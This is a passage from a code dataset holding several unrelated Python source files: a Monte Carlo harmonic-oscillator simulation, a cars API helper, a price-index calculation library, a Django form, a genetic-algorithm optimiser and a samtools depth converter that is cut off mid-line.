0.5 * (-1 / alpha**2 + x**2 / alpha**4) \n \n return k_en\n\n# FUNCTION TO PERFORM THE ITERATIVE PROCEDURE\n\n@njit\ndef montecarlo(x, alpha):\n \n Delta = 4 # Value of parameter for displacement\n\n # First, the equilibration steps\n\n wf2 = WF(x,alpha)\n\n N_acc1 = 0\n # cum_en = 0\n # cum_en2 = 0 \n # std = 1 \n # mean = 1\n # s = 0\n \n # Equilibration with std (NB does not work well with adaptive scheme for delta!!)\n \n # while std / mean > 0.02: # stop the equilibration when variance is smaller than 1%\n \n # # An adaptive scheme for Delta would be needed\n\n # x, N_acc1, wf2 = metropolis(x, N_acc1, wf2, Delta, alpha)\n \n # # Instead of using a chosen number of equilibration steps, we have to\n # # use the convergence of the energy to stop the procedure \n \n # # Cumulate the observables\n # loc_en = k_energy(x, alpha) + p_energy(x)\n # cum_en += loc_en\n # cum_en2 += loc_en**2\n \n # if s >= 2 and s%5 == 0:\n \n # mean = cum_en / s\n # std = m.sqrt( 1 / (s-1) * ( cum_en2 / s - mean**2) )\n \n # s += 1\n \n # # An adaptive scheme for Delta \n \n # if s != 0 and s%5 == 0:\n \n # if N_acc1 / s >= 0.55:\n \n # Delta += 0.05 * 4\n \n # elif N_acc1 / s <= 0.45:\n \n # Delta -= 0.05 * 4\n \n # Equilibration with chosen steps \n \n for s in range(0,N_eq): # stop the equilibration when variance is smaller than 1%\n \n # An adaptive scheme for Delta would be needed\n\n x, N_acc1, wf2 = metropolis(x, N_acc1, wf2, Delta, alpha)\n \n # An adaptive scheme for Delta \n \n if s != 0 and s%5 == 0:\n \n if N_acc1 / s >= 0.55:\n \n Delta += 0.05 * 4\n \n elif N_acc1 / s <= 0.45:\n \n Delta -= 0.05 * 4\n \n # If we do things in the following way, we choose the length of the \n # simulation. Alternatively we can choose again the target accuracy\n # The problem in doing so is that for some values of the variational \n # parameter (too far from exact) a high accuracy may take forever to reach\n\n N_acc2 = 0\n cum_en = 0 # Reset cumulative variable\n cum_en2 = 0 # Reset cumulative variable\n\n for s in range(0, N_steps):\n\n x, N_acc2, wf2 = metropolis(x, N_acc2, wf2, Delta, alpha)\n \n # An adaptive scheme for Delta \n \n if s != 0 and s%5 == 0:\n \n if N_acc2 / s >= 0.55:\n \n Delta += 0.05 * 4\n \n elif N_acc2 / s <= 0.45:\n \n Delta -= 0.05 * 4\n \n loc_en = k_energy(x, alpha) + p_energy(x)\n cum_en += loc_en\n cum_en2 += loc_en**2\n \n mean_en = cum_en / N_steps\n std_en = m.sqrt( 1 / (N_steps-1) * ( cum_en2 / N_steps - mean_en**2) )\n\n accf = N_acc2/N_steps\n \n return accf, mean_en, std_en\n\n# FUNCTION TO IMPLEMENT THE VARIATIONAL PROCEDURE\n\n# Option 1: Re-run the MC simulation using a different variational parameter \n# each time. This has the advantage of working in any range of parameters but \n# requires us to run the simulation multiple times\n\n@njit\ndef variational_1(x):\n \n alpha = np.arange(0.3, 3, 0.05) # vector for parameters to try\n \n l = len(alpha)\n \n accept = np.zeros(l)\n mean = np.zeros(l)\n std = np.zeros(l) \n \n # run the simulation for all the parameters \n \n for i in range(0, l):\n \n accept[i], mean[i], std[i] = montecarlo(x, alpha[i])\n \n return alpha, accept, mean, std\n\n# Option 2: Run the simulation only once and use reweighting to compute the \n# result for different variational parameters. It has the advantage of running\n# a single simulation but only works in a range of parameters ( of course since \n# we usually have an idea of rhe result, this is the preferred choice)\n\n@njit\ndef variational_2(x):\n \n alpha = np.arange(0.8, 1.2, 0.01) # vector for parameters to try\n \n \n \n return alpha, accept, mean, std\n\n\n# EXECUTION OF THE PROCEDURE\n\n# Start procedure timing\n\nstart = time.time()\n\n# Set initial conditions\n\nx = 0\n\n# Run the MC simulation\n\nalpha, accept, mean, std = variational_1(x)\n\nprint(\"\\n The energy is {} pm {}\".format(np.min(mean), std[np.argmin(mean)]))\n\n# Plot the energy as a function of the variational parameter\n\nfig, ax= plt.subplots(1, figsize=(8,5.5))\nplt.errorbar(alpha, mean, std, elinewidth=1, linewidth = 0, marker=\".\", ms = 3, mec=\"blue\", mfc=\"blue\", label=\"Simulation Result\")\nplt.grid()\nplt.axhline(0.5, linewidth = 0.8, c= \"red\", label=\"Exact Value\")\n# plt.xlim([0.9,1.1])\n# plt.ylim([0.49, 0.51]) # Uncomment to see that tiny errorbars are actually there\nplt.xlabel(r\"$\\alpha$\", fontsize=14)\nplt.ylabel(\"Energy\", fontsize=14)\nplt.title(\"Energy\", fontsize=18)\nplt.legend()\nplt.savefig(\"Energies.png\", dpi = 300)\n\n# Plot the std as a function of alpha\n\nfig, ax= plt.subplots(1, figsize=(8,5.5))\nplt.plot(alpha, std, linewidth = 0, marker=\".\", ms = 3, mec=\"blue\", mfc=\"blue\")\nplt.grid()\n# plt.xlim([0.9,1.1])\n# plt.ylim([0.49, 0.51]) # Uncomment to see that tiny errorbars are actually there\nplt.xlabel(r\"$\\alpha$\", fontsize=14)\nplt.ylabel(\"Std\", fontsize=14)\nplt.title(\"Standard Deviation\", fontsize=18)\nplt.savefig(\"Standard Deviation.png\", dpi = 300)\n\n# Plot the acceptance probability as a function of alpha\n\nfig, ax= plt.subplots(1, figsize=(8,5.5))\nplt.plot(alpha, accept, linewidth = 0, marker=\".\", ms = 3, mec=\"blue\", mfc=\"blue\")\nplt.grid()\n# plt.xlim([0.9,1.1])\n# plt.ylim([0.49, 0.51]) # Uncomment to see that tiny errorbars are actually there\nplt.xlabel(r\"$\\alpha$\", fontsize=14)\nplt.ylabel(r\"$p_{acc}$\", fontsize=14)\nplt.title(\"Acceptance probability\", fontsize=18)\nplt.savefig(\"Acceptance Probability.png\", dpi = 300)\n\n# End procedure timing\n\nend = time.time()\n\nprint(\"\\n The simulation took me {} seconds\".format(end-start))\n","repo_name":"NerusSkyhigh/computationalphysics2021","sub_path":"Exercise_4/Warmup_HO/Warmup_HO_2.py","file_name":"Warmup_HO_2.py","file_ext":"py","file_size_in_byte":7891,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"1183581482","text":"import json\nfrom datetime import datetime\n\n# the following class is used to represent a list of cars\nclass Cars:\n car_list = []\n\n def __init__(self):\n self.car_list = []\n def create_car(self, id, make, module, year):\n write_message(\"create_car called\")\n new_car = {'id': id, 'make': make, 'module': module, 'year': year}\n if self.get_car(id):\n write_message(\"POST /api/v1/objects/cars already exist\")\n return None\n self.car_list.append(new_car)\n write_message(\"POST /api/v1/objects/cars\" + str(new_car))\n return json.dumps(new_car)\n def get_car(self, id):\n write_message(\"get_car called\")\n for car in self.car_list:\n if car['id'] == id:\n write_message(\"GET /api/v1/objects/cars\" + str(car))\n return car\n write_message(\"GET /api/v1/objects/cars not found\")\n return None\n\n def update_car(self, id, make, module, year):\n write_message(\"update_car called\")\n for car in self.car_list:\n if car['id'] == id:\n car['make'] = make\n car['module'] = module\n car['year'] = year\n write_message(\"PUT /api/v1/objects/cars\" + str(car))\n return json.dumps(car)\n write_message(\"PUT /api/v1/objects/cars not found\")\n return None\n\n def delete_car(self, id):\n write_message(\"delete_car called\")\n for car in self.car_list:\n if car['id'] == id:\n self.car_list.remove(car)\n write_message(\"DELETE /api/v1/objects/cars\" + str(car))\n return json.dumps(car)\n write_message(\"DELETE /api/v1/objects/cars not found\")\n return None\n\n\ndef write_message(message):\n to_save = datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\") + ': ' + message + '\\n'\n with open('message.txt', 'a') as f:\n # write the message with time stamp\n f.write(to_save)\n print(to_save)\n","repo_name":"tl11bi/terraform-provider-connor-example","sub_path":"terraform_mastercard_api_example/python-flask-docker/src/cars.py","file_name":"cars.py","file_ext":"py","file_size_in_byte":1995,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"23189893213","text":"\"\"\"\nProvides the following functions:\n\n* :func:`bilateral_methods`\n* :func:`multilateral_methods`\n\nWith the following bilateral price index methods:\n\n* Carli, Jevons, Dutot, Laspeyres, Paasche, geom_Laspeyres, geom_Paasche,\n Drobish, Marshall Edgeworth, Palgrave, Fisher, Tornqvist, Walsh, Sato Vartia,\n Geary Khamis, Rothwell.\n\nand the following multilateral price index methods:\n\n* The GEKS method paired with a bilateral method, the Geary-Khamis method (GK)\n and Time Dummy methods (TPD, TDH).\n\"\"\"\nfrom typing import Sequence, Optional, Union\n\nimport pandas as pd\nimport seaborn as sns\n\nfrom .helpers import _weights_calc\nfrom .bilateral import *\nfrom .multilateral import *\n\n__author__ = ['Dr. Usman Kayani']\n\ndef bilateral_methods(\n df: pd.DataFrame,\n price_col: str = 'price',\n quantity_col: str = 'quantity',\n date_col: str='month',\n product_id_col: str='id',\n groups: Optional[Sequence[str]] = None,\n method: str = 'tornqvist',\n base_month: Union[int, str] = 1,\n reference_month: Union[int, str] = 1,\n plot: bool = False,\n) -> pd.DataFrame:\n \"\"\"\n Calculate all the bilateral indices.\n\n Parameters\n ----------\n df: pandas DataFrame\n Contains price and quantity columns, a time series column, and a product\n ID column as a minimum. A characteristics column should also be present\n for hedonic methods.\n price_col: str, defaults to 'price'\n User-defined name for the price column.\n quantity_col: str, defaults to 'quantity'\n User-defined name for the quantity column.\n date_col: str, defaults to 'month'\n User-defined name for the date column.\n product_id_col: str, defaults to 'id'\n User-defined name for the product ID column.\n groups: list of str, defaults to None\n The names of the groups columns.\n method: str, defaults to 'tornqvist'\n Options: {'carli', 'jevons', 'dutot', 'laspeyres', 'paasche',\n 'geom_laspeyres', 'geom_paasche', 'drobish', 'marshall_edgeworth',\n 'palgrave', 'fisher', 'tornqvist', 'walsh', 'sato_vartia', 'lowe',\n 'geary_khamis_b', 'tpd', 'rothwell'}\n\n The bilateral method to use.\n base_month: int or str, defaults to 1\n Integer or string specifying the base month. An integer specifies the\n position while a string species the month in the format 'YYYY-MM'.\n reference_month: int or str, defaults to 1\n Integer or string specifying the reference month for rebasing if\n different from the base month. An integer specifies the position while a\n string species the month in the format 'YYYY-MM'.\n plot: bool, defaults to False\n Boolean parameter on whether to plot the resulting timeseries for price\n indices.\n\n Returns\n -------\n pd.DataFrame\n Dataframe containing the timeseries and index values.\n \"\"\"\n method = method.lower()\n\n valid_bilateral_methods = {\n 'carli', 'jevons', 'dutot', 'laspeyres', 'lowe',\n 'paasche', 'geom_laspeyres', 'geom_paasche', 'drobish',\n 'marshall_edgeworth', 'palgrave', 'fisher', 'tornqvist',\n 'walsh', 'sato_vartia', 'geary_khamis_b', 'tpd', 'rothwell'\n }\n\n if method not in valid_bilateral_methods:\n raise ValueError(\"Invalid option, please select a valid bilateral method.\")\n\n args = (price_col, quantity_col, date_col, product_id_col)\n\n periods = sorted(df[date_col].unique())\n no_of_periods = len(periods)\n\n if isinstance(base_month, str):\n base_month = periods.index(base_month) + 1\n\n if isinstance(reference_month, str):\n reference_month = periods.index(reference_month) + 1\n\n # Obtain the base period in the dataframe.\n base_period = periods[base_month-1]\n\n # Determine product IDs present in the base period.\n df_base_master = df.loc[df[date_col] == base_period]\n keep_ids = df_base_master.loc[:, product_id_col].unique()\n\n # Filter df to remove product IDs not present in the base period.\n df = df[df[product_id_col].isin(keep_ids)].reset_index(drop=True)\n\n if groups:\n return (\n df\n .groupby(groups)\n .apply(\n lambda df_group: bilateral_methods(\n df_group,\n *args,\n method=method,\n base_month=base_month,\n reference_month=reference_month,\n plot=plot,\n )\n )\n .reset_index()\n .rename({'level_1': 'month'}, axis=1)\n )\n\n index_vals = np.zeros(no_of_periods)\n\n if method != 'tpd':\n # Obtain bilateral function for bilateral method.\n func = globals()[method]\n\n for i in range(no_of_periods):\n # Get data for base and current period.\n df_base = df_base_master\n df_curr = df.loc[df[date_col] == periods[i]]\n\n # Make sure the sample is matched for given periods.\n df_base = df_base[df_base[product_id_col].isin(df_curr[product_id_col])]\n df_curr = df_curr[df_curr[product_id_col].isin(df_base[product_id_col])]\n\n if method == 'tpd':\n # Use multilateral TPD method with two periods.\n df_matched = (\n pd.concat([df_base, df_curr])\n .drop_duplicates()\n )\n # Recalculate weights for matched df.\n df_matched = _weights_calc(df_matched)\n # Append values to upper triangular of matrix.\n index_vals[i] = time_dummy(df_matched)[-1]\n else:\n # Find price and quantity vectors of base period and current period.\n p_base = df_base[price_col].to_numpy()\n p_curr = df_curr[price_col].to_numpy()\n data = (p_base, p_curr)\n\n # Get quantities for bilateral methods that use this information.\n if method in {\n 'laspeyres', 'drobish', 'marshall_edgeworth',\n 'geom_laspeyres', 'tornqvist', 'fisher',\n 'walsh', 'sato_vartia', 'geary_khamis_b', \n 'rothwell', 'lowe'\n }:\n q_base = df_base[quantity_col].to_numpy()\n data += (q_base, )\n if method in {\n 'paasche', 'drobish','palgrave',\n 'marshall_edgeworth', 'geom_paasche', 'tornqvist',\n 'fisher', 'walsh', 'sato_vartia',\n 'geary_khamis_b'\n }:\n q_curr = df_curr[quantity_col].to_numpy()\n data += (q_curr, )\n\n # Determine the bilaterals for each base and current period and\n # append to upper tringular of matrix.\n index_vals[i] = func(*data)\n\n output_df = (\n pd.DataFrame(\n index_vals,\n index=periods\n )\n .rename({0: 'index_value'}, axis=1)\n )\n output_df.sort_index(inplace=True)\n if base_month != reference_month:\n # Rebase the index values to the reference month.\n output_df = output_df / output_df.iloc[reference_month-1]\n if plot:\n sns.set(rc={'figure.figsize':(11, 4)})\n (output_df * 100).plot(linewidth=2)\n return output_df\n\ndef multilateral_methods(\n df: pd.DataFrame,\n price_col: str = 'price',\n quantity_col: str = 'quantity',\n date_col: str='month',\n product_id_col: str='id',\n characteristics: Optional[Sequence[str]] = None,\n groups: Optional[Sequence[str]] = None,\n method: str = 'all',\n bilateral_method: str = 'tornqvist',\n td_engine: str = 'numpy',\n reference_month: Union[int, str] = 1,\n plot: bool = False,\n) -> pd.DataFrame:\n \"\"\"\n Calculate all the multilateral indices.\n\n Currently supported: GEKS (geks), Geary-Khamis (gk), Time Product Dummy\n (tpd) and Time Hedonic Dummy (tdh).\n\n Parameters\n ----------\n df: pandas DataFrame\n Contains price and quantity columns, a time series column, and a product\n ID column as a minimum. A characteristics column should also be present\n for hedonic methods.\n price_col: str, defaults to 'price'\n User-defined name for the price column.\n quantity_col: str, defaults to 'quantity'\n User-defined name for the quantity column.\n date_col: str, defaults to 'month'\n User-defined name for the date column.\n product_id_col: str, defaults to 'id'\n User-defined name for the product ID column.\n characteristics: list of str, defaults to None\n The names of the characteristics columns.\n groups: list of str, defaults to None\n The names of the groups columns.\n method: str, defaults to 'all'\n Options: {'all', 'geks', gk', 'tpd', 'tdh'}\n\n The multilateral method to apply. The 'all' option uses the\n GEKS paired with a bilateral, GK and TPD index.\n bilateral_method: str, defaults to 'tornqvist'\n Options: {'carli', 'jevons', 'dutot', 'laspeyres', 'paasche',\n 'geom_laspeyres', 'geom_paasche', 'drobish', 'marshall_edgeworth',\n 'palgrave', 'fisher', 'tornqvist', 'walsh', 'sato_vartia', 'lowe',\n 'geary_khamis_b', 'rothwell'}\n\n The bilateral method to pair with `method='geks'`.\n td_engine: str, defaults to 'numpy'\n Options: {'numpy', 'statsmodels', 'sklearn', 'pyspark'}\n\n Engine to use for wls computation with `method='tpd'`.\n reference_month: int or str, defaults to 1\n The month to use as the reference month for the multilateral methods. An\n integer specifies the position while a string species the month in the\n format 'YYYY-MM'.\n plot: bool, defaults to False\n Boolean parameter on whether to plot the resulting timeseries for price\n indices.\n\n Returns\n -------\n pd.DataFrame\n Dataframe containing the timeseries and index values.\n \"\"\"\n method, bilateral_method = method.lower(), bilateral_method.lower()\n\n valid_methods = {'all', 'geks', 'gk', 'tpd', 'tdh'}\n valid_bilateral_methods = {\n 'carli', 'jevons', 'dutot', 'laspeyres', 'lowe',\n 'paasche', 'geom_laspeyres', 'geom_paasche', 'drobish',\n 'marshall_edgeworth', 'palgrave', 'fisher', 'tornqvist',\n 'walsh', 'sato_vartia', 'geary_khamis_b', 'tpd', 'rothwell'\n }\n\n if method not in valid_methods:\n raise ValueError(\"Invalid option, please select a valid method.\")\n\n if method in {'all', 'geks'} and bilateral_method not in valid_bilateral_methods:\n raise ValueError(\"Invalid option, please select a valid bilateral method for GEKS.\")\n\n args = (price_col, quantity_col, date_col, product_id_col)\n\n # Obtain unique time periods present in the data.\n periods = sorted(df[date_col].unique())\n\n if isinstance(reference_month, str):\n reference_month = periods.index(reference_month) + 1\n\n if groups:\n return (\n df\n .groupby(groups)\n .apply(\n lambda df_group: multilateral_methods(\n df_group,\n *args,\n characteristics=characteristics,\n method=method,\n bilateral_method=bilateral_method,\n td_engine=td_engine,\n reference_month=reference_month,\n plot=plot\n )\n )\n .reset_index()\n .rename({'level_1': 'month'}, axis=1)\n )\n if quantity_col not in df.columns:\n df[quantity_col] = 1\n if bilateral_method not in ('jevons', 'carli', 'dutot'):\n # Calculate weights for each item in each period.\n df = _weights_calc(df, *args)\n\n if method == 'all':\n index_vals = {\n f'index_value_geks': geks(df, *args, bilateral_method),\n 'index_value_gk': geary_khamis(df, *args),\n 'index_value_td': time_dummy(df, *args, characteristics, engine=td_engine)\n }\n elif method == 'geks':\n index_vals = geks(df, *args, bilateral_method)\n elif method == 'gk':\n index_vals = geary_khamis(df, *args)\n elif method == 'tpd':\n index_vals = time_dummy(df, *args, None, engine=td_engine)\n elif method == 'tdh':\n if not characteristics:\n raise ValueError(\"Characteristics required for TDH.\")\n else:\n index_vals = time_dummy(df, *args, characteristics, engine=td_engine)\n output_df = (\n pd.DataFrame(\n index_vals,\n index=periods\n )\n .rename({0: 'index_value'}, axis=1)\n )\n output_df.sort_index(inplace=True)\n if reference_month != 1:\n output_df = output_df / output_df.iloc[reference_month - 1]\n if plot:\n sns.set(rc={'figure.figsize':(11, 4)})\n (output_df * 100).plot(linewidth=2)\n return output_df\n","repo_name":"drrobotk/PriceIndexCalc","sub_path":"src/PriceIndexCalc/pandas_modules/index_methods.py","file_name":"index_methods.py","file_ext":"py","file_size_in_byte":12816,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"37946154442","text":"from django import forms\nfrom .models import Note\n\nclass noteform(forms.ModelForm):\n\n class Meta:\n model = Note\n fields = ['title','text','color']\n labels = {'title':'Enter Title','text':'Despcription','color':'Colour'}\n widgets={\n 'title':forms.TextInput(attrs={'class':'title'}),\n # 'text':forms.Textarea(attrs={'class':'title'}),\n # 'color':forms.Select(attrs={'class':'title'}),\n # 'date':forms.DateInput(attrs={'type':'date','class':'title'})\n\n }","repo_name":"rjcoder86/Notes-App","sub_path":"app/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":538,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"27240670150","text":"import datetime\nimport numpy as np\nfrom matplotlib.ticker import MultipleLocator\nfrom numpy.ma import cos\nimport matplotlib.pyplot as plt\nfrom matplotlib import cm\nfrom mpl_toolkits.mplot3d import Axes3D\nimport math\n\nDNA_SIZE = 12 # 编码长度\nPOP_SIZE = 100 # 种群大小\nCROSS_RATE = 0.8 # 交叉率\nMUTA_RATE = 0.8 # 变异率\nIterations = 100 # 代次数\n\n# 最大值问题范围\nX_BOUND = [0, 10] # X区间\nY_BOUND = [0, 10] # Y区间\n\n# 最小值问题范围\n# X_BOUND = [1, 2] # X区间\n# Y_BOUND = [1, 2] # Y区间\n\ndef F(x, y): # 问题函数\n # 最大值问题\n return (6.452 * (x + 0.125 * y) * (cos(x) - cos(2 * y)) ** 2) / (0.8 + (x - 4.2) ** 2 + 2 * (y - 7) ** 2) + 3.226 * y\n # 最小值问题\n # return -(20+x**2+y**2-10*(cos(2*math.pi*x)+cos(2*math.pi*y)))\n\ndef decodeDNA(pop): # 基因解码\n x1_pop = pop[:, 0::4]\n y1_pop = pop[:, 1::4]\n x2_pop = pop[:, 2::4]\n y2_pop = pop[:, 3::4]\n\n x1 = x1_pop.dot(2 ** np.arange(DNA_SIZE)[::-1]) / float(2 ** DNA_SIZE - 1) * (X_BOUND[1] - X_BOUND[0]) + X_BOUND[0]\n y1 = y1_pop.dot(2 ** np.arange(DNA_SIZE)[::-1]) / float(2 ** DNA_SIZE - 1) * (Y_BOUND[1] - Y_BOUND[0]) + Y_BOUND[0]\n x2 = x2_pop.dot(2 ** np.arange(DNA_SIZE)[::-1]) / float(2 ** DNA_SIZE - 1) * (X_BOUND[1] - X_BOUND[0]) + X_BOUND[0]\n y2 = y2_pop.dot(2 ** np.arange(DNA_SIZE)[::-1]) / float(2 ** DNA_SIZE - 1) * (Y_BOUND[1] - Y_BOUND[0]) + Y_BOUND[0]\n\n x = []\n y = []\n for i in range(POP_SIZE):\n if F(x1[i],y1[i]) > F(x2[i],y2[i]):\n x.append(x1[i])\n y.append(y1[i])\n else:\n x.append(x2[i])\n y.append(y2[i])\n return x, y\n\ndef getfitness(pop): # 计算适应度函数\n x, y = decodeDNA(pop)\n temp = []\n for i in range(POP_SIZE):\n temp.append(F(x[i], y[i]))\n return (temp - np.min(temp)) + 0.0001 # 减去最小的适应度是为了防止适应度出现负数\n\ndef select(pop, fitness): # 根据适应度选择(蒙特卡罗)\n temp = np.random.choice(np.arange(POP_SIZE), size=POP_SIZE, replace=True, p=(fitness) / (fitness.sum()))\n return pop[temp]\n\ndef merge(i, j):\n temp = []\n\n i_x1_pop, i_y1_pop = i[0::4], i[1::4]\n i_x2_pop, i_y2_pop = i[2::4], i[3::4]\n j_x1_pop, j_y1_pop = j[0::4], j[1::4]\n j_x2_pop, j_y2_pop = j[2::4], j[3::4]\n\n i_x1 = i_x1_pop.dot(2 ** np.arange(DNA_SIZE)[::-1]) / float(2 ** DNA_SIZE - 1) * (X_BOUND[1] - X_BOUND[0]) + X_BOUND[0]\n i_y1 = i_y1_pop.dot(2 ** np.arange(DNA_SIZE)[::-1]) / float(2 ** DNA_SIZE - 1) * (Y_BOUND[1] - Y_BOUND[0]) + Y_BOUND[0]\n i_x2 = i_x2_pop.dot(2 ** np.arange(DNA_SIZE)[::-1]) / float(2 ** DNA_SIZE - 1) * (X_BOUND[1] - X_BOUND[0]) + X_BOUND[0]\n i_y2 = i_y2_pop.dot(2 ** np.arange(DNA_SIZE)[::-1]) / float(2 ** DNA_SIZE - 1) * (Y_BOUND[1] - Y_BOUND[0]) + Y_BOUND[0]\n\n j_x1 = j_x1_pop.dot(2 ** np.arange(DNA_SIZE)[::-1]) / float(2 ** DNA_SIZE - 1) * (X_BOUND[1] - X_BOUND[0]) + X_BOUND[0]\n j_y1 = j_y1_pop.dot(2 ** np.arange(DNA_SIZE)[::-1]) / float(2 ** DNA_SIZE - 1) * (Y_BOUND[1] - Y_BOUND[0]) + Y_BOUND[0]\n j_x2 = j_x2_pop.dot(2 ** np.arange(DNA_SIZE)[::-1]) / float(2 ** DNA_SIZE - 1) * (X_BOUND[1] - X_BOUND[0]) + X_BOUND[0]\n j_y2 = j_y2_pop.dot(2 ** np.arange(DNA_SIZE)[::-1]) / float(2 ** DNA_SIZE - 1) * (Y_BOUND[1] - Y_BOUND[0]) + Y_BOUND[0]\n\n if F(i_x1, i_y1) > F(i_x2, i_y2):\n i_x_pop = i_x1_pop\n i_y_pop = i_y1_pop\n else:\n i_x_pop = i_x2_pop\n i_y_pop = i_y2_pop\n\n if F(j_x1, j_y1) > F(j_x2, j_y2):\n j_x_pop = j_x1_pop\n j_y_pop = j_y1_pop\n else:\n j_x_pop = j_x2_pop\n j_y_pop = j_y2_pop\n\n for i in range(DNA_SIZE):\n temp.append(i_x_pop[i])\n temp.append(i_y_pop[i])\n temp.append(j_x_pop[i])\n temp.append(j_y_pop[i])\n\n return temp\n\ndef crossmuta(pop, CROSS_RATE): # 种群的交叉变异操作\n new_pop = []\n for i in pop: # 遍历种群中的每一个个体,将该个体作为父代\n j = pop[np.random.randint(POP_SIZE)] # 从种群中随机选择另一个个体,并将该个体作为母代\n temp = merge(i, j) # 两个个体的显性基因相结合成新个体\n if np.random.rand() < CROSS_RATE: # 以交叉概率发生交叉\n cpoints1 = np.random.randint(0, DNA_SIZE * 4 - 1) # 随机产生交叉的两个点(区间:[cpoints1, cpoints2])\n cpoints2 = np.random.randint(cpoints1, DNA_SIZE * 4)\n temp[cpoints1:cpoints2] = j[cpoints1:cpoints2] # 子代得到位于交叉点后的母代的基因\n\n mutation(temp, MUTA_RATE) # 每一个后代以变异率发生变异\n new_pop.append(temp)\n return new_pop\n\ndef mutation(temp, MUTA_RATE):\n if np.random.rand() < MUTA_RATE: # 以MUTA_RATE的概率进行变异\n mutate_point = np.random.randint(0, DNA_SIZE * 4) # 随机产生一个实数,代表要变异基因的位置\n temp[mutate_point] = temp[mutate_point] ^ 1 # 将变异点的二进制为反转\n\n# 画图\ndef plot_3d(ax):\n X = np.linspace(*X_BOUND, 100)\n Y = np.linspace(*Y_BOUND, 100)\n X, Y = np.meshgrid(X, Y)\n Z = F(X, Y)\n ax.plot_surface(X, Y, Z, rstride=1, cstride=1, cmap=cm.coolwarm)\n ax.set_zlim(-20, 100)\n ax.set_xlabel('x')\n ax.set_ylabel('y')\n ax.set_zlabel('z')\n plt.pause(3)\n plt.show()\n\ndef OPT2_TEST():\n i_list = range(100)\n best_fitness = []\n best_f = []\n for i in i_list:\n print(i)\n pop = np.random.randint(2, size=(POP_SIZE, DNA_SIZE * 4)) # pop(二维矩阵) = (种群数) * (DNA长度 * 4) 个 0,1 随机数\n for _ in range(Iterations): # 迭代 N 代\n pop = np.array(crossmuta(pop, CROSS_RATE)) # 对种群进行交叉(cross)和变异(muta)\n fitness = getfitness(pop) # 计算种群每一个基因的适应度函数\n pop = select(pop, fitness) # 选择生成新的种群\n\n fitness = getfitness(pop)\n maxfitness = np.argmax(fitness)\n x, y = decodeDNA(pop)\n best_fitness.append(fitness[maxfitness])\n best_f.append(F(x[maxfitness], y[maxfitness]))\n\n best_f.sort()\n plt.plot(i_list, best_f, marker='o', label=\"F_max(x,y)\")\n plt.gca().xaxis.set_major_locator(MultipleLocator(10))\n plt.legend()\n plt.show()\n\ndef print_info(pop): # 用于输出结果\n fitness = getfitness(pop)\n maxfitness = np.argmax(fitness) # 返回最大值的索引值\n print(\"迭代次数: \", Iterations)\n print(\"最大适应度: \", fitness[maxfitness])\n x,y = decodeDNA(pop)\n print(\"最优基因型: \", pop[maxfitness])\n print(\"最优解 (x,y) = \", (x[maxfitness], y[maxfitness]))\n print(\"最优值 F(x,y) = \", F(x[maxfitness],y[maxfitness]))\n\nif __name__ == \"__main__\":\n\n # OPT2_TEST()\n\n fig = plt.figure()\n ax = Axes3D(fig)\n plt.ion()\n plot_3d(ax)\n\n start_t = datetime.datetime.now()\n pop = np.random.randint(2, size=(POP_SIZE, DNA_SIZE * 4)) # pop(二维矩阵) = 种群数 * (DNA长度 * 2) 个 0,1 随机数\n for _ in range(Iterations): # 迭代 N 代\n x, y = decodeDNA(pop)\n temp = []\n for i in range(POP_SIZE):\n temp.append(F(x[i], y[i]))\n # 更新画图\n if 'sca' in locals():\n sca.remove()\n sca = ax.scatter(x, y, temp, c='black', marker='o')\n plt.show()\n plt.pause(0.1)\n\n pop = np.array(crossmuta(pop, CROSS_RATE)) # 对种群进行交叉(cross)和变异(muta)\n fitness = getfitness(pop) # 计算种群每一个基因的适应度函数\n pop = select(pop, fitness) # 选择生成新的种群\n\n end_t = datetime.datetime.now()\n print(\"耗时: \", (end_t - start_t))\n print_info(pop)\n plt.ioff()\n plot_3d(ax)\n\n","repo_name":"WondrousWisdomcard/SYSU-JuniorExperience","sub_path":"人工智能/作业/3 - 遗传算法求最值/opt_2.py","file_name":"opt_2.py","file_ext":"py","file_size_in_byte":7757,"program_lang":"python","lang":"en","doc_type":"code","stars":52,"dataset":"github-code","pt":"21"} +{"seq_id":"35379410328","text":"#!/usr/bin/env python\n\nimport sys, csv\nimport subprocess as sp\nimport codecs\n\nPYVER = sys.version_info.major\n\ndef Next(c):\n if PYVER == 2:\n return c.next()\n else:\n return c.__next__()\n\nclass Converter(object):\n blockChrom = \"\"\n blockStart = 0\n blockEnd = 0\n blockValue = 0\n scale = 1.0\n chrom = None\n window = None\n total = 0.0 # For window mode\n bamfile = None\n outfile = \"/dev/stdout\"\n \n def __init__(self, args):\n prev = \"\"\n for a in args:\n if prev == \"-s\":\n self.scale = float(a)\n prev = \"\"\n elif prev == \"-c\":\n self.chrom = a\n prev = \"\"\n elif prev == \"-o\":\n self.outfile = a\n prev = \"\"\n elif prev == \"-w\":\n self.window = int(a)\n prev = \"\"\n elif a in [\"-s\", \"-c\", \"-o\", \"-w\"]:\n prev = a\n else:\n self.bamfile = a\n\n def initialize(self, line):\n self.blockChrom = line[0]\n self.blockStart = int(line[1])\n self.blockEnd = self.blockStart\n self.blockValue = int(line[2])\n self.total = self.blockValue\n\n def writeBlock(self, out):\n out.write(\"{}\\t{}\\t{}\\t{}\\n\".format(self.blockChrom, self.blockStart-1, self.blockEnd-1, self.blockValue * self.scale)) \n\n def run(self):\n if self.chrom:\n cmdline = \"samtools depth -r {} {}\".format(self.chrom, self.bamfile)\n else:\n cmdline = \"samtools depth {}\".format(self.bamfile)\n proc = sp.Popen(cmdline, shell=True, stdout=sp.PIPE)\n with open(self.outfile, \"w\") as out:\n if PYVER == 2:\n c = csv.reader(proc.stdout, delimiter='\\t')\n else:\n c = csv.reader(codecs.iterdecode(proc.stdout, 'utf-8'), delimiter='\\t')\n line = Next(c)\n self.initialize(line)\n if self.window:\n self.run_window(c, out)\n else:\n for line in c:\n if line[0] != self.blockChrom:\n self.writeBlock(out)\n self.initialize(line)\n elif int(line[2]) == self.blockValue:\n self.blockEnd = int(line[1])\n else:\n self.writeBlock(out)\n self.initialize(line)\n self.writeBlock(out)\n\n def writeWindow(self, out):\n sz = 